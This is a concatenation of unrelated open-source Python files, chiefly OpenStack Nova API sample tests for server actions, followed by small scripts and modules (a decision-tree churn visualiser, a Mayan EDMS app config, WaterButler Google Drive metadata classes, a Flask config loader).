'hostid': '[a-f0-9]+',
'glance_host': self._get_glance_host(),
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::'
}
self._verify_response('server-put-resp', subs, response, 200)
class ServersSampleJson232Test(ServersSampleBase):
microversion = '2.32'
sample_dir = 'servers'
scenarios = [('v2_32', {'api_major_version': 'v2.1'})]
def test_servers_post(self):
self._post_server(use_common_server_api_samples=False)
class ServersSampleJson237Test(ServersSampleBase):
microversion = '2.37'
sample_dir = 'servers'
scenarios = [('v2_37', {'api_major_version': 'v2.1'})]
def test_servers_post(self):
self._post_server(use_common_server_api_samples=False)
class ServersSampleJson242Test(ServersSampleBase):
microversion = '2.42'
sample_dir = 'servers'
scenarios = [('v2_42', {'api_major_version': 'v2.1'})]
def test_servers_post(self):
self._post_server(use_common_server_api_samples=False)
class ServersSampleJson247Test(ServersSampleJsonTest):
microversion = '2.47'
scenarios = [('v2_47', {'api_major_version': 'v2.1'})]
use_common_server_post = False
def test_server_rebuild(self):
uuid = self._post_server()
image = fake.get_valid_image_id()
params = {
'uuid': image,
'name': 'foobar',
'pass': 'seekr3t',
'hostid': '[a-f0-9]+',
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::',
}
resp = self._do_post('servers/%s/action' % uuid,
'server-action-rebuild', params)
subs = params.copy()
del subs['uuid']
self._verify_response('server-action-rebuild-resp', subs, resp, 202)
class ServersSampleJson252Test(ServersSampleJsonTest):
microversion = '2.52'
scenarios = [('v2_52', {'api_major_version': 'v2.1'})]
use_common_server_post = False
class ServersSampleJson263Test(ServersSampleBase):
microversion = '2.63'
scenarios = [('v2_63', {'api_major_version': 'v2.1'})]
def setUp(self):
super(ServersSampleJson263Test, self).setUp()
self.common_subs = {
'hostid': '[a-f0-9]+',
'instance_name': 'instance-\d{8}',
'hypervisor_hostname': r'[\w\.\-]+',
'hostname': r'[\w\.\-]+',
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::',
'user_data': (self.user_data if six.PY2
else self.user_data.decode('utf-8')),
'cdrive': '.*',
}
def test_servers_post(self):
self._post_server(use_common_server_api_samples=False)
def test_server_rebuild(self):
uuid = self._post_server(use_common_server_api_samples=False)
fakes.stub_out_key_pair_funcs(self)
image = fake.get_valid_image_id()
params = {
'uuid': image,
'name': 'foobar',
'key_name': 'new-key',
'description': 'description of foobar',
'pass': 'seekr3t',
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::',
}
resp = self._do_post('servers/%s/action' % uuid,
'server-action-rebuild', params)
exp_resp = params.copy()
del exp_resp['uuid']
exp_resp['hostid'] = '[a-f0-9]+'
self._verify_response('server-action-rebuild-resp',
exp_resp, resp, 202)
def test_servers_details(self):
uuid = self._post_server(use_common_server_api_samples=False)
response = self._do_get('servers/detail?limit=1')
subs = self.common_subs.copy()
subs['id'] = uuid
self._verify_response('servers-details-resp', subs, response, 200)
def test_server_get(self):
uuid = self._post_server(use_common_server_api_samples=False)
response = self._do_get('servers/%s' % uuid)
subs = self.common_subs.copy()
subs['id'] = uuid
self._verify_response('server-get-resp', subs, response, 200)
def test_server_update(self):
uuid = self._post_server(use_common_server_api_samples=False)
subs = self.common_subs.copy()
subs['id'] = uuid
response = self._do_put('servers/%s' % uuid,
'server-update-req', subs)
self._verify_response('server-update-resp', subs, response, 200)
class ServersSampleJson266Test(ServersSampleBase):
microversion = '2.66'
scenarios = [('v2_66', {'api_major_version': 'v2.1'})]
def setUp(self):
super(ServersSampleJson266Test, self).setUp()
self.common_subs = {
'hostid': '[a-f0-9]+',
'instance_name': 'instance-\d{8}',
'hypervisor_hostname': r'[\w\.\-]+',
'hostname': r'[\w\.\-]+',
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::',
'user_data': (self.user_data if six.PY2
else self.user_data.decode('utf-8')),
'cdrive': '.*',
}
def test_get_servers_list_with_changes_before(self):
uuid = self._post_server(use_common_server_api_samples=False)
current_time = timeutils.parse_isotime(timeutils.utcnow().isoformat())
response = self._do_get(
'servers?changes-before=%s' % timeutils.normalize_time(
current_time))
subs = self.common_subs.copy()
subs['id'] = uuid
self._verify_response(
'servers-list-with-changes-before', subs, response, 200)
def test_get_servers_detail_with_changes_before(self):
uuid = self._post_server(use_common_server_api_samples=False)
current_time = timeutils.parse_isotime(timeutils.utcnow().isoformat())
response = self._do_get(
'servers/detail?changes-before=%s' % timeutils.normalize_time(
current_time))
subs = self.common_subs.copy()
subs['id'] = uuid
self._verify_response(
'servers-details-with-changes-before', subs, response, 200)
class ServersSampleJson267Test(ServersSampleBase):
microversion = '2.67'
scenarios = [('v2_67', {'api_major_version': 'v2.1'})]
def setUp(self):
super(ServersSampleJson267Test, self).setUp()
self.useFixture(nova_fixtures.CinderFixtureNewAttachFlow(self))
def test_servers_post(self):
return self._post_server(use_common_server_api_samples=False)
class ServersSampleJson269Test(ServersSampleBase):
microversion = '2.69'
scenarios = [('v2_69', {'api_major_version': 'v2.1'})]
def setUp(self):
super(ServersSampleJson269Test, self).setUp()
def _fake_instancemapping_get_by_cell_and_project(*args, **kwargs):
# global cell based on which rest of the functions are stubbed out
cell_fixture = nova_fixtures.SingleCellSimple()
return [{
'id': 1,
'updated_at': None,
'created_at': None,
'instance_uuid': utils_fixture.uuidsentinel.inst,
'cell_id': 1,
'project_id': "6f70656e737461636b20342065766572",
'cell_mapping': cell_fixture._fake_cell_list()[0],
'queued_for_delete': False
}]
self.stub_out('nova.objects.InstanceMappingList.'
'_get_not_deleted_by_cell_and_project_from_db',
_fake_instancemapping_get_by_cell_and_project)
def test_servers_list_from_down_cells(self):
uuid = self._post_server(use_common_server_api_samples=False)
with nova_fixtures.DownCellFixture():
response = self._do_get('servers')
subs = {'id': uuid}
self._verify_response('servers-list-resp', subs, response, 200)
def test_servers_details_from_down_cells(self):
uuid = self._post_server(use_common_server_api_samples=False)
with nova_fixtures.DownCellFixture():
response = self._do_get('servers/detail')
subs = {'id': uuid}
self._verify_response('servers-details-resp', subs, response, 200)
def test_server_get_from_down_cells(self):
uuid = self._post_server(use_common_server_api_samples=False)
with nova_fixtures.DownCellFixture():
response = self._do_get('servers/%s' % uuid)
subs = {'id': uuid}
self._verify_response('server-get-resp', subs, response, 200)
class ServersSampleJson271Test(ServersSampleBase):
microversion = '2.71'
scenarios = [('v2_71', {'api_major_version': 'v2.1'})]
def setUp(self):
super(ServersSampleJson271Test, self).setUp()
self.common_subs = {
'hostid': '[a-f0-9]+',
'instance_name': 'instance-\d{8}',
'hypervisor_hostname': r'[\w\.\-]+',
'hostname': r'[\w\.\-]+',
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::',
'user_data': (self.user_data if six.PY2
else self.user_data.decode('utf-8')),
'cdrive': '.*',
}
# create server group
subs = {'name': 'test'}
response = self._do_post('os-server-groups',
'server-groups-post-req', subs)
self.sg_uuid = self._verify_response('server-groups-post-resp',
subs, response, 200)
def _test_servers_post(self):
return self._post_server(
use_common_server_api_samples=False,
extra_subs={'sg_uuid': self.sg_uuid})
def test_servers_get_with_server_group(self):
uuid = self._test_servers_post()
response = self._do_get('servers/%s' % uuid)
subs = self.common_subs.copy()
subs['id'] = uuid
self._verify_response('server-get-resp', subs, response, 200)
def test_servers_update_with_server_groups(self):
uuid = self._test_servers_post()
subs = self.common_subs.copy()
subs['id'] = uuid
response = self._do_put('servers/%s' % uuid,
'server-update-req', subs)
self._verify_response('server-update-resp', subs, response, 200)
def test_servers_rebuild_with_server_groups(self):
uuid = self._test_servers_post()
fakes.stub_out_key_pair_funcs(self)
image = fake.get_valid_image_id()
params = {
'uuid': image,
'name': 'foobar',
'key_name': 'new-key',
'description': 'description of foobar',
'pass': 'seekr3t',
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::',
}
resp = self._do_post('servers/%s/action' % uuid,
'server-action-rebuild', params)
subs = self.common_subs.copy()
subs.update(params)
subs['id'] = uuid
del subs['uuid']
self._verify_response('server-action-rebuild-resp', subs, resp, 202)
def test_server_get_from_down_cells(self):
def _fake_instancemapping_get_by_cell_and_project(*args, **kwargs):
# global cell based on which rest of the functions are stubbed out
cell_fixture = nova_fixtures.SingleCellSimple()
return [{
'id': 1,
'updated_at': None,
'created_at': None,
'instance_uuid': utils_fixture.uuidsentinel.inst,
'cell_id': 1,
'project_id': "6f70656e737461636b20342065766572",
'cell_mapping': cell_fixture._fake_cell_list()[0],
'queued_for_delete': False
}]
self.stub_out('nova.objects.InstanceMappingList.'
'_get_not_deleted_by_cell_and_project_from_db',
_fake_instancemapping_get_by_cell_and_project)
uuid = self._test_servers_post()
with nova_fixtures.DownCellFixture():
response = self._do_get('servers/%s' % uuid)
subs = {'id': uuid}
self._verify_response('server-get-down-cell-resp',
subs, response, 200)
class ServersUpdateSampleJsonTest(ServersSampleBase):
def test_update_server(self):
uuid = self._post_server()
subs = {}
subs['hostid'] = '[a-f0-9]+'
subs['access_ip_v4'] = '1.2.3.4'
subs['access_ip_v6'] = '80fe::'
response = self._do_put('servers/%s' % uuid,
'server-update-req', subs)
self._verify_response('server-update-resp', subs, response, 200)
class ServersUpdateSampleJson247Test(ServersUpdateSampleJsonTest):
microversion = '2.47'
scenarios = [('v2_47', {'api_major_version': 'v2.1'})]
class ServerSortKeysJsonTests(ServersSampleBase):
sample_dir = 'servers-sort'
def test_servers_list(self):
self._post_server()
response = self._do_get('servers?sort_key=display_name&sort_dir=asc')
self._verify_response('server-sort-keys-list-resp', {}, response,
200)
class _ServersActionsJsonTestMixin(object):
def _test_server_action(self, uuid, action, req_tpl,
subs=None, resp_tpl=None, code=202):
subs = subs or {}
subs.update({'action': action,
'glance_host': self._get_glance_host()})
response = self._do_post('servers/%s/action' % uuid,
req_tpl,
subs)
if resp_tpl:
self._verify_response(resp_tpl, subs, response, code)
else:
self.assertEqual(code, response.status_code)
self.assertEqual("", response.text)
return response
class ServersActionsJsonTest(ServersSampleBase, _ServersActionsJsonTestMixin):
USE_NEUTRON = True
def test_server_reboot_hard(self):
uuid = self._post_server()
self._test_server_action(uuid, "reboot",
'server-action-reboot',
{"type": "HARD"})
def test_server_reboot_soft(self):
uuid = self._post_server()
self._test_server_action(uuid, "reboot",
'server-action-reboot',
{"type": "SOFT"})
def test_server_rebuild(self):
uuid = self._post_server()
image = fake.get_valid_image_id()
params = {
'uuid': image,
'name': 'foobar',
'pass': 'seekr3t',
'hostid': '[a-f0-9]+',
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::',
}
resp = self._do_post('servers/%s/action' % uuid,
'server-action-rebuild', params)
subs = params.copy()
del subs['uuid']
self._verify_response('server-action-rebuild-resp', subs, resp, 202)
def test_server_resize(self):
self.flags(allow_resize_to_same_host=True)
uuid = self._post_server()
self._test_server_action(uuid, "resize",
'server-action-resize',
{"id": '2',
"host": self._get_host()})
return uuid
def test_server_revert_resize(self):
uuid = self.test_server_resize()
self._test_server_action(uuid, "revertResize",
'server-action-revert-resize')
def test_server_confirm_resize(self):
uuid = self.test_server_resize()
self._test_server_action(uuid, "confirmResize",
'server-action-confirm-resize',
code=204)
class ServersActionsJsonTestNovaNet(
ServersSampleBase, _ServersActionsJsonTestMixin):
# TODO(gibi): fix the tests to work with neutron as nova net is deprecated
USE_NEUTRON = False
def _wait_for_active_server(self, uuid):
"""Wait 10 seconds for the server to be ACTIVE, else fail.
:param uuid: The server id.
:returns: The ACTIVE server.
"""
server = self._do_get('servers/%s' % uuid,
return_json_body=True)['server']
count = 0
while server['status'] != 'ACTIVE' and count < 10:
time.sleep(1)
server = self._do_get('servers/%s' % uuid,
return_json_body=True)['server']
count += 1
if server['status'] != 'ACTIVE':
self.fail('Timed out waiting for server %s to be ACTIVE.' % uuid)
return server
def test_server_add_floating_ip(self):
uuid = self._post_server()
# Get the server details so we can find a fixed IP to use in the
# addFloatingIp request.
server = self._wait_for_active_server(uuid)
addresses = server['addresses']
# Find a fixed IP.
fixed_address = None
for network, ips in addresses.items():
for ip in ips:
if ip['OS-EXT-IPS:type'] == 'fixed':
fixed_address = ip['addr']
break
if fixed_address:
break
if fixed_address is None:
self.fail('Failed to find a fixed IP for server %s in addresses: '
'%s' % (uuid, addresses))
subs = {
"address": "10.10.10.10",
"fixed_address": fixed_address
}
# This is gross, but we need to stub out the associate_floating_ip
# call in the FloatingIPActionController since we don't have a real
# networking service backing this up, just the fake nova-network stubs.
self.stub_out('nova.network.api.API.associate_floating_ip',
lambda *a, **k: None)
self._test_server_action(uuid, 'addFloatingIp',
'server-action-addfloatingip-req', subs)
def test_server_remove_floating_ip(self):
server_uuid = self._post_server()
self._wait_for_active_server(server_uuid)
subs = {
"address": "172.16.10.7"
}
self.stub_out('nova.network.api.API.get_floating_ip_by_address',
lambda *a, **k: {'fixed_ip_id':
'a0c566f0-faab-406f-b77f-2b286dc6dd7e'})
self.stub_out(
'nova.network.api.API.get_instance_id_by_floating_address',
lambda *a, **k: server_uuid)
self.stub_out('nova.network.api.API.disassociate_floating_ip',
lambda *a, **k: None)
self._test_server_action(server_uuid, 'removeFloatingIp',
'server-action-removefloatingip-req', subs)
class ServersActionsJson219Test(ServersSampleBase):
microversion = '2.19'
scenarios = [('v2_19', {'api_major_version': 'v2.1'})]
def test_server_rebuild(self):
uuid = self._post_server()
image = fake.get_valid_image_id()
params = {
'uuid': image,
'name': 'foobar',
'description': 'description of foobar',
'pass': 'seekr3t',
'hostid': '[a-f0-9]+',
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::',
}
resp = self._do_post('servers/%s/action' % uuid,
'server-action-rebuild', params)
subs = params.copy()
del subs['uuid']
self._verify_response('server-action-rebuild-resp', subs, resp, 202)
class ServersActionsJson226Test(ServersSampleBase):
microversion = '2.26'
scenarios = [('v2_26', {'api_major_version': 'v2.1'})]
def test_server_rebuild(self):
uuid = self._post_server()
image = fake.get_valid_image_id()
params = {
'uuid': image,
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::',
'disk_config': 'AUTO',
'hostid': '[a-f0-9]+',
'name': 'foobar',
'pass': 'seekr3t',
'preserve_ephemeral': 'false',
'description': 'description of foobar'
}
# Add 'tag1' and 'tag2' tags
self._do_put('servers/%s/tags/tag1' % uuid)
self._do_put('servers/%s/tags/tag2' % uuid)
# Rebuild Action
resp = self._do_post('servers/%s/action' % uuid,
'server-action-rebuild', params)
subs = params.copy()
del subs['uuid']
self._verify_response('server-action-rebuild-resp', subs, resp, 202)
class ServersActionsJson254Test(ServersSampleBase):
microversion = '2.54'
sample_dir = 'servers'
scenarios = [('v2_54', {'api_major_version': 'v2.1'})]
def _create_server(self):
return self._post_server()
def test_server_rebuild(self):
fakes.stub_out_key_pair_funcs(self)
uuid = self._create_server()
image = fake.get_valid_image_id()
params = {
'uuid': image,
'name': 'foobar',
'key_name': 'new-key',
'description': 'description of foobar',
'pass': 'seekr3t',
'hostid': '[a-f0-9]+',
'access_ip_v4': '1.2.3.4',
'access_ip_v6': '80fe::',
}
resp = self._do_post('servers/%s/action' % uuid,
'server-action-rebuild', params)
subs = params.copy()
del subs['uuid']
self._verify_response('server-action-rebuild-resp', subs, resp, 202)
class ServersActionsJson257Test(ServersActionsJson254Test):
"""Tests rebuilding a server with new user_data."""
microversion = '2.57'
scenarios = [('v2_57', {'api_major_version': 'v2.1'})]
def _create_server(self):
return self._post_server(use_common_server_api_samples=False)
class ServersCreateImageJsonTest(ServersSampleBase,
_ServersActionsJsonTestMixin):
"""Tests the createImage server action API against 2.1."""
def test_server_create_image(self):
uuid = self._post_server()
resp = self._test_server_action(uuid, 'createImage',
'server-action-create-image',
{'name': 'foo-image'})
# we should have gotten a location header back
self.assertIn('location', resp.headers)
# we should not have gotten a body back
self.assertEqual(0, len(resp.content))
class ServersCreateImageJsonTestv2_45(ServersCreateImageJsonTest):
"""Tests the createImage server action API against 2.45."""
microversion = '2.45'
scenarios = [('v2_45', {'api_major_version': 'v2.1'})]
def test_server_create_image(self):
uuid = self._post_server()
resp = self._test_server_action(
uuid, 'createImage', 'server-action-create-image',
{'name': 'foo-image'}, 'server-action-create-image-resp')
# assert that no location header was returned
self.assertNotIn('location', resp.headers)
class ServerStartStopJsonTest(ServersSampleBase):
def _test_server_action(self, uuid, action, req_tpl):
response = self._do_post('servers/%s/action' % uuid,
req_tpl,
{'action': action})
self.assertEqual(202, response.status_code)
self.assertEqual("", response.text)
def test_server_start(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-stop', 'server-action-stop')
self._test_server_action(uuid, 'os-start', 'server-action-start')
def test_server_stop(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-stop', 'server-action-stop')
class ServersSampleMultiStatusJsonTest(ServersSampleBase):
def test_servers_list(self):
uuid = self._post_server()
response = self._do_get('servers?limit=1&status=active&status=error')
subs = {'id': uuid, 'status': 'error'}
self._verify_response('servers-list-status-resp', subs, response, 200)
class ServerTriggerCrashDumpJsonTest(ServersSampleBase):
microversion = '2.17'
scenarios = [('v2_17', {'api_major_version': 'v2.1'})]
def test_trigger_crash_dump(self):
uuid = self._post_server()
response = self._do_post('servers/%s/action' % uuid,
'server-action-trigger-crash-dump',
{})
self.assertEqual(response.status_code, 202)
self.assertEqual(response.text, "")
| 37.638173 | 79 | 0.593131 |
795c67d2421a273cab1c570b6a0a74aa56dc60d8 | 69 | py | Python | VideoDownloader.py | zhuduan/youtube-dl-gui | 77a1fe1d49a157e8f2a06f3d04a2b43d7d2cbbce | [
"Unlicense"
] | 4 | 2018-12-12T07:53:41.000Z | 2019-02-03T11:05:16.000Z | VideoDownloader.py | zhuduan/youtube-dl-gui | 77a1fe1d49a157e8f2a06f3d04a2b43d7d2cbbce | [
"Unlicense"
] | null | null | null | VideoDownloader.py | zhuduan/youtube-dl-gui | 77a1fe1d49a157e8f2a06f3d04a2b43d7d2cbbce | [
"Unlicense"
] | 1 | 2019-02-10T08:54:00.000Z | 2019-02-10T08:54:00.000Z | # -*- coding: utf-8 -*-
import youtube_dl_gui
youtube_dl_gui.main() | 13.8 | 23 | 0.695652 |
795c680ab2684cf05ad3e71c9cb77a3a5a746f98 | 1,840 | py | Python | dtree_visualization.py | parwisenlared/Churn_analysis | a2c0e36fa3b6d12cefced05bde7b922a05722f67 | [
"MIT"
] | null | null | null | dtree_visualization.py | parwisenlared/Churn_analysis | a2c0e36fa3b6d12cefced05bde7b922a05722f67 | [
"MIT"
] | null | null | null | dtree_visualization.py | parwisenlared/Churn_analysis | a2c0e36fa3b6d12cefced05bde7b922a05722f67 | [
"MIT"
] | null | null | null | import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report,confusion_matrix
from sklearn.tree import DecisionTreeClassifier
from IPython.display import Image
from sklearn.externals.six import StringIO
from sklearn.tree import export_graphviz
import pydot
from sklearn import tree
import pydotplus
data = pd.read_csv("user_satisfaction_survey.csv")
X = data.drop(['Churn','ID','Classes_per_week'], axis=1) #Dropping the ID column also - its not needed
y = data.drop(['ID','Classes_per_week','Happy_with_instructors','Happy_with_class_duration','Happy_with_class_timings','Happy_with_class_size','Happy_with_facilities','Happy_with_price'],axis=1)
def convert_yes_no(text):
if 'Yes' in text:
return 1
else: return 0
X.Happy_with_instructors = X.Happy_with_instructors.apply(convert_yes_no)
X.Happy_with_class_duration = X.Happy_with_class_duration.apply(convert_yes_no)
X.Happy_with_class_timings = X.Happy_with_class_timings.apply(convert_yes_no)
X.Happy_with_class_size = X.Happy_with_class_size.apply(convert_yes_no)
X.Happy_with_facilities = X.Happy_with_facilities.apply(convert_yes_no)
X.Happy_with_price = X.Happy_with_price.apply(convert_yes_no)
y.Churn = y.Churn.apply(convert_yes_no)
def plot_dtree(model, feature_name):
dot_data = StringIO()
tree.export_graphviz(model, out_file=dot_data,
feature_names=feature_name,
filled=True,
rounded=True,
)
graph = pydotplus.graph_from_dot_data(dot_data.getvalue())
graph.write_png("dt_visualization.png")
return Image(graph.create_png())
X_train = X
Y_train = y
model = tree.DecisionTreeClassifier()
model = model.fit(X_train,Y_train)
plot_dtree(model, X_train.columns) | 38.333333 | 194 | 0.760326 |
795c684e755b76bc868038a9ecfc7eaa91e449f4 | 215 | py | Python | 7_Sarven_Desert/298-Odd_Sandstorm/odd_sandstorm.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | 7_Sarven_Desert/298-Odd_Sandstorm/odd_sandstorm.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | 7_Sarven_Desert/298-Odd_Sandstorm/odd_sandstorm.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | everybody = ['Yetu', 'Tabitha', 'Rasha', 'Max', 'Yazul', 'Todd']
enemyIndex = 0
while enemyIndex < everybody.length:
ogre = everybody[enemyIndex]
hero.attack(ogre)
enemyIndex += 2
hero.moveXY(35, 54)
| 21.5 | 65 | 0.651163 |
795c68d935f060555dbba4756549e650afc0c462 | 1,511 | py | Python | mayan/apps/locales/apps.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 2 | 2021-09-12T19:41:19.000Z | 2021-09-12T19:41:20.000Z | mayan/apps/locales/apps.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 37 | 2021-09-13T01:00:12.000Z | 2021-10-02T03:54:30.000Z | mayan/apps/locales/apps.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 1 | 2021-09-22T13:17:30.000Z | 2021-09-22T13:17:30.000Z | import logging
from django.conf import settings
from django.contrib.auth.signals import user_logged_in
from django.db.models.signals import post_save
from django.utils.translation import ugettext_lazy as _
from mayan.apps.common.apps import MayanAppConfig
from mayan.apps.common.menus import menu_user
from .handlers import (
handler_user_locale_profile_session_config,
handler_user_locale_profile_create
)
from .links import link_current_user_locale_profile_details, link_current_user_locale_profile_edit
from .patches import patchDjangoTranslation
logger = logging.getLogger(name=__name__)
class LocalesApp(MayanAppConfig):
app_namespace = 'locales'
app_url = 'locales'
has_rest_api = False
has_tests = False
name = 'mayan.apps.locales'
verbose_name = _('Locales')
def ready(self):
super().ready()
patchDjangoTranslation()
menu_user.bind_links(
links=(
link_current_user_locale_profile_details, link_current_user_locale_profile_edit,
), position=50
)
post_save.connect(
dispatch_uid='common_handler_user_locale_profile_create',
receiver=handler_user_locale_profile_create,
sender=settings.AUTH_USER_MODEL
)
user_logged_in.connect(
dispatch_uid='common_handler_user_locale_profile_session_config',
receiver=handler_user_locale_profile_session_config
)
| 30.836735 | 99 | 0.714097 |
795c6938c9f19246b74ce5384b7478525638a6a6 | 289 | py | Python | sam/entrypoint.py | cssat/sam-iam | 8ad7f67d19fda8b5b9c08e4d3bbb57d429c45fda | [
"MIT"
] | 4 | 2019-06-17T20:54:03.000Z | 2020-10-09T22:42:21.000Z | sam/entrypoint.py | cssat/sam-iam | 8ad7f67d19fda8b5b9c08e4d3bbb57d429c45fda | [
"MIT"
] | 1 | 2020-05-19T20:33:00.000Z | 2020-05-20T23:32:50.000Z | sam/entrypoint.py | cssat/sam-iam | 8ad7f67d19fda8b5b9c08e4d3bbb57d429c45fda | [
"MIT"
] | 5 | 2019-06-18T19:11:18.000Z | 2021-03-25T06:25:33.000Z | import click
from .config.cmds import configure
from .iam.cmds import iam
@click.group()
def cli():
"""
Basic Setup of the Ping 2 Aws Federated Programmatic Access Creation via a manual or automated process.
"""
pass
cli.add_command(configure)
cli.add_command(iam) | 18.0625 | 111 | 0.712803 |
795c6953575d993b2db6915a20faf673abae0c70 | 3,703 | py | Python | waterbutler/providers/googledrive/metadata.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | waterbutler/providers/googledrive/metadata.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | waterbutler/providers/googledrive/metadata.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | from waterbutler.core import metadata
from waterbutler.providers.googledrive import utils
class BaseGoogleDriveMetadata(metadata.BaseMetadata):
def __init__(self, raw, path):
super().__init__(raw)
self._path = path
@property
def provider(self):
return 'googledrive'
@property
def path(self):
return '/' + self._path.raw_path
@property
def materialized_path(self):
return str(self._path)
@property
def extra(self):
return {'revisionId': self.raw['version']}
class GoogleDriveFolderMetadata(BaseGoogleDriveMetadata, metadata.BaseFolderMetadata):
def __init__(self, raw, path):
super().__init__(raw, path)
self._path._is_folder = True
@property
def id(self):
return self.raw['id']
@property
def name(self):
return self.raw['title']
@property
def export_name(self):
return self.name
class GoogleDriveFileMetadata(BaseGoogleDriveMetadata, metadata.BaseFileMetadata):
@property
def id(self):
return self.raw['id']
@property
def name(self):
title = self.raw['title']
if self.is_google_doc:
ext = utils.get_extension(self.raw)
title += ext
return title
@property
def size(self):
# Google docs(Docs,sheets, slides, etc) don't have file size before they are exported
return self.raw.get('fileSize')
@property
def modified(self):
return self.raw['modifiedDate']
@property
def content_type(self):
return self.raw['mimeType']
@property
def etag(self):
return self.raw['version']
@property
def extra(self):
ret = super().extra
if self.is_google_doc:
ret['downloadExt'] = utils.get_download_extension(self.raw)
ret['webView'] = self.raw.get('alternateLink')
return ret
@property
def is_google_doc(self):
return utils.is_docs_file(self.raw) is not None
@property
def export_name(self):
title = self.raw['title']
if self.is_google_doc:
ext = utils.get_download_extension(self.raw)
title += ext
return title
class GoogleDriveFileRevisionMetadata(GoogleDriveFileMetadata):
@property
def id(self):
return self.raw['id']
@property
def name(self):
title = self.raw.get('originalFilename', self._path.name)
if self.is_google_doc:
ext = utils.get_extension(self.raw)
title += ext
return title
@property
def size(self):
# Google docs(Docs,sheets, slides, etc) don't have file size before they are exported
return self.raw.get('fileSize')
@property
def modified(self):
return self.raw['modifiedDate']
@property
def content_type(self):
return self.raw['mimeType']
@property
def etag(self):
return self.raw['etag']
@property
def extra(self):
if self.is_google_doc:
return {'downloadExt': utils.get_download_extension(self.raw)}
return {'md5': self.raw['md5Checksum']}
@property
def export_name(self):
title = self.raw.get('originalFilename', self._path.name)
if self.is_google_doc:
ext = utils.get_download_extension(self.raw)
title += ext
return title
class GoogleDriveRevision(metadata.BaseFileRevisionMetadata):
@property
def version_identifier(self):
return 'revision'
@property
def version(self):
return self.raw['id']
@property
def modified(self):
return self.raw['modifiedDate']
| 23.436709 | 94 | 0.622198 |
795c6a899bbe1cf71c1fb301fe494ae122dbbb04 | 1,818 | py | Python | config.py | trandangtien1122/react_flask_temp_1 | 13c45f1e85fc11f5d6e1cc98a7d558d7b346cdd7 | [
"Apache-2.0"
] | 6 | 2020-03-06T13:11:23.000Z | 2021-04-15T05:07:43.000Z | config.py | trandangtien1122/react_flask_temp_1 | 13c45f1e85fc11f5d6e1cc98a7d558d7b346cdd7 | [
"Apache-2.0"
] | 1 | 2021-03-10T14:47:25.000Z | 2021-03-10T14:47:25.000Z | config.py | trandangtien1122/react_flask_temp_1 | 13c45f1e85fc11f5d6e1cc98a7d558d7b346cdd7 | [
"Apache-2.0"
] | 3 | 2021-02-04T02:06:24.000Z | 2021-06-07T18:35:24.000Z | from dotenv import load_dotenv
from pytz import timezone
import os
DEFAULTS = {
# TODO: remove unsed database
"MYSQL_HOST": "localhost",
"MYSQL_USERNAME": "myuser",
"MYSQL_PASSWORD": "mypassword",
"MYSQL_DATABASE": "mydatabase",
"MONGO_URL": "mongodb://localhost:27017",
"MONGO_DB": "mydatabase",
"LOG_FOLDER": "_logs",
"IS_DEBUG": False,
}
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
DATE_FORMAT = "%Y-%m-%d"
def load_config():
# read out existing os environment
load_dotenv()
config = {
# TODO: remove unused database
"MYSQL_HOST": os.getenv("MYSQL_HOST"),
"MYSQL_USERNAME": os.getenv("MYSQL_USERNAME"),
"MYSQL_PASSWORD": os.getenv("MYSQL_PASSWORD"),
"MYSQL_DATABASE": os.getenv("MYSQL_DATABASE"),
"MONGO_URL": os.getenv("MONGO_URL"),
"MONGO_DB": os.getenv("MONGO_DB"),
"LOG_FOLDER": os.getenv("LOG_FOLDER"),
"IS_DEBUG": os.getenv("IS_DEBUG") == "1",
}
# apply defaults for missing config params
for key in DEFAULTS:
if key not in config or config[key] is None:
config[key] = DEFAULTS[key]
# check if log folder exists
if not os.path.isdir(config["LOG_FOLDER"]):
os.mkdir(config["LOG_FOLDER"])
return config
def get_log_folder():
config = load_config()
return config["LOG_FOLDER"]
def get_mysql_config():
config = load_config()
return config["MYSQL_HOST"], config["MYSQL_DATABASE"], config["MYSQL_USERNAME"], config["MYSQL_PASSWORD"]
def get_mongodb_config():
config = load_config()
return config["MONGO_URL"], config["MONGO_DB"]
def get_timezone():
# TODO: replace with your time zone
return timezone("Australia/Melbourne")
def is_debug():
config = load_config()
return config["IS_DEBUG"]
| 24.567568 | 109 | 0.643564 |
795c6c075d9007ecc111851fd4504f2bb903b35a | 263 | py | Python | School146/forms/album_form.py | mihdenis85/Synergy | 8811530b7d45a07f9f1be3da9d1a714d5677c1f7 | [
"MIT"
] | null | null | null | School146/forms/album_form.py | mihdenis85/Synergy | 8811530b7d45a07f9f1be3da9d1a714d5677c1f7 | [
"MIT"
] | null | null | null | School146/forms/album_form.py | mihdenis85/Synergy | 8811530b7d45a07f9f1be3da9d1a714d5677c1f7 | [
"MIT"
